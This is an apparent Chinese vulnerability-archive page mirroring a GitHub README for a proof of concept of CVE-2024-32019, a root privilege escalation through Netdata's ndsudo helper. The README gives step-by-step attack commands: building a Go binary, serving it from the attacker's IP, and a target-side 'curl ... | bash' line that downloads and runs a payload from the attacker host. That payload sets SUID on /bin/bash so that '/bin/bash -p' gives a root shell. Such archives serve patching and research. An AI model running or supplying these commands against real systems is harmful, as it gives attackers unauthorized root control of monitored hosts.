目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%
请我们喝杯咖啡

CVE-2024-32019 PoC — Netdata 安全漏洞

来源
https://github.com/C0deInBlack/CVE-2024-32019-poc
关联漏洞
标题:Netdata 安全漏洞 (CVE-2024-32019)
Description:Netdata是Netdata开源的一个高保真基础设施监控和故障排除应用程序。 Netdata存在安全漏洞。攻击者利用该漏洞以 root 权限运行任意程序。
Description
Netdata ndsudo PoC
介绍
# CVE-2024-32019-poc
Netdata ndsudo PoC

Build the binary:
```bash
go build -ldflags "-s -w" -o nvme poc.go
upx nvme
```
Run the bash script:
```
bash exploit.sh <YOUR IP>
```
In target machine run in a writable directory:
```bash
curl http://<YOUT IP>:8000/payload.sh | bash
```
It will automatically download the nvme binary, export the path, run ndsudo and add **SUID** to `/bin/bash`.
Probably you need to change the ndsudo path in `exploit.sh`

To escalate privileges just run:
```bash
/bin/bash -p
```

## Note:
The exploit is based in https://github.com/AzureADTrent/CVE-2024-32019-POC, when I tested it, I had the error:
```bash
execve: Exec format error
```
That's why I decided to create mine with Go.
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →